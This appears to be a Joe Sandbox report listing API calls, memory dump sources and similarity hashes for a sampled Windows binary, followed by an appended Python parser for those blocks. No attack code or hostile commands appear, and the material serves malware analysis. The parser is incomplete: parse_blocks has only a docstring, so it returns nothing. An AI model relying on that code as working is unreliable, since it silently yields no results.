                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE64
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3874763886-0
                                                                                                                    • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                    • Instruction ID: 93bd9967961ae498392f02c231caa2ae154bb390240f73a08be53760b780a47c
                                                                                                                    • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                    • Instruction Fuzzy Hash: D6F0FF61B15B4A87EF54AF659408178EDE1FF8EF92BA89434CD0E46390FE3CA444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
• Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
• Instruction ID: 2a60d51aa00c3d334817cc2f7f6f41368badf87669877e9b166c541aade4c68c
• Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
• Instruction Fuzzy Hash: E5F0F231A24A82CBD6046F10E844279BE70FB8AF43F95A228DA0A02394EF3CD008CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
  • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
• wcschr.MSVCRT ref: 00007FF789BF11DC
• memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF789BE827A), ref: 00007FF789BF1277
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$AllocateProcessmemmovewcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 4220614737-381716982
• Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
• Instruction ID: 240b9367e5877c88ed8d5c4f170839325144dc0fa7160fc2a4b7a6c3da17ec5f
• Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
• Instruction Fuzzy Hash: 1371E871B0828686EB60EF56E440679FAF4FB94F9AFA00635C94D83B90DF3DA541CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
  • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
  • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
  • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
• longjmp.MSVCRT ref: 00007FF789BDCCBC
• longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDCCE0
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
• String ID: GeToken: (%x) '%s'
• API String ID: 3282654869-1994581435
• Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
• Instruction ID: 2a65669840159072e08c2a0276c4a970bf1e2ef61dbc760cff059c984aba67b0
• Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
• Instruction Fuzzy Hash: 8F61C061A0964AC2FA54BF21D454179AAB0BF44FAAFF84534DA1E077E1EE3DF940C320
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memmovewcsncmp
• String ID: 0123456789
• API String ID: 3879766669-2793719750
• Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction ID: 24b95796633e5d1fa29b0b4f7cafcfad5154dc5552ce79017e6e532e1ec17f80
• Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction Fuzzy Hash: 2B41D522B1878E85EA64AF2994046BAABB4FB44F81FA49131DE4E43794FE3CD441C750
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE97D0
  • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
  • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
  • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE98D7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction ID: 91f006a9209554163dd88b751647980732440737407261108dc13317130dc60d
• Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
• Instruction Fuzzy Hash: 3E417F22A0975E81EA04EF56D45903DABB8FB84FD1FA08131DE5E477E1EE39E846C350
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEA0FC
  • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
  • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
  • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
  • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEA1FB
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
• Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction ID: 2ea2bddf2b0a007a61f861c7e841e9c847c2ec7c182b30e69adf9dbd8d7395f5
• Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
• Instruction Fuzzy Hash: 22418F22A09B5A81EA00EF16D44443DABBCFB85FD1FA08131DE5E477E1EE39E946C350
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitle
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3358957663-3695764949
                                                                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction ID: 646374a0ed368522b8caf40984f5b25c294191b618e7bb202494354d1578c4da
                                                                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction Fuzzy Hash: 80319021A0964A82EA44BF52A844078EEB4FF49FE6FA45535DE1E077D5DF3CE841C324
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpswscanf
                                                                                                                    • String ID: :EOF
                                                                                                                    • API String ID: 1534968528-551370653
                                                                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction ID: 90a07ccb2dcd07cebf43d4d04d71ce76afb848d206f64974b86aacceafbfb006
                                                                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction Fuzzy Hash: 5431A271A0D64A8AFB54BF55E4842B8FAB0FF45F62FE44031DA4D06290DF2CE942C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmp
                                                                                                                    • String ID: /-Y
                                                                                                                    • API String ID: 1886669725-4274875248
                                                                                                                    • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                    • Instruction ID: 46c45cdd6ba39034870d6d22d6afa89cfbf3861329f2d0e2806c467a2c18532c
                                                                                                                    • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                    • Instruction Fuzzy Hash: DF218166E0875981EA50AF02954027DFEB0BB44FD6FE58031DE9C17794EE3CE482E320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 3$3
                                                                                                                    • API String ID: 0-2538865259
                                                                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction ID: 74c151d912120985f0b44087bde21283383c215998ff22fdaf03a9ee2c543326
                                                                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction Fuzzy Hash: 46013931D0A58A8AF394BF61D888278FA70BF80B27FF40135D40E015A2DF2E6585CA60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617791916-0
                                                                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction ID: 359634feeda40882ccdad0a3af20f993fbffb9be1b8cb8178b33350d32e73de3
                                                                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction Fuzzy Hash: 00413972A0968686EA55AF21E448179FBB0FF85F82FE48134DA4E07794DF3DE540CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%
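The per-function blocks above (imported API calls with call-site addresses, the memory dump they came from, and the Similarity identifiers) are emitted as flat text. As an added example that is not part of the Joe Sandbox report, the following Python parses such blocks into records, strips the "Download File" link text that the page fuses onto the Associated lines, and turns each call-site address into an RVA relative to the dump's image base so it can be looked up in a disassembler. The sample input is two blocks excerpted from this report; reading the first dotted field of the .sdmp name as the process index is an assumption.

```python
"""Parse Joe Sandbox per-function blocks into records (added example, not report code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks excerpted from this report (process 4 dump
# based at 0x7FF789BC0000) with repeated lines trimmed; page residue left in on purpose.
SAMPLE_REPORT = """\
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
• Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
• Instruction ID: 646374a0ed368522b8caf40984f5b25c294191b618e7bb202494354d1578c4da
• Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
• Instruction Fuzzy Hash: 80319021A0964A82EA44BF52A844078EEB4FF49FE6FA45535DE1E077D5DF3CE841C324
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 359634feeda40882ccdad0a3af20f993fbffb9be1b8cb8178b33350d32e73de3
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: 00413972A0968686EA55AF21E448179FBB0FF85F82FE48134DA4E07794DF3DE540CB60
Uniqueness

Uniqueness Score: -1.00%
"""

API_CALL_RE = re.compile(r"^• (?P<name>[\w?@]+)\.(?P<module>[^(]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^• Source File: (?P<file>[^,]+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+):\s*(?P<value>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[0-9.]+)%$")


@dataclass
class ApiCall:
    name: str
    module: str            # API set / DLL the import was resolved against
    args: tuple[str, ...]
    ref: int               # virtual address of the call site in the dump


@dataclass
class FunctionBlock:
    api_calls: list[ApiCall] = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    fields: dict[str, str] = field(default_factory=dict)   # Similarity identifiers etc.
    uniqueness_score: float | None = None

    @property
    def process_index(self) -> int:
        # Assumption: the first dotted field of the .sdmp name is the process index.
        return int(self.source_file.split(".")[0])

    def call_site_rvas(self) -> list[int]:
        # Call-site VA minus the base the dump is "based on" gives an RVA usable in IDA/Ghidra.
        return [c.ref - self.image_base for c in self.api_calls]


def parse_blocks(text: str) -> list[FunctionBlock]:
    """One FunctionBlock per 'Uniqueness Score' terminator; plain header lines are skipped."""
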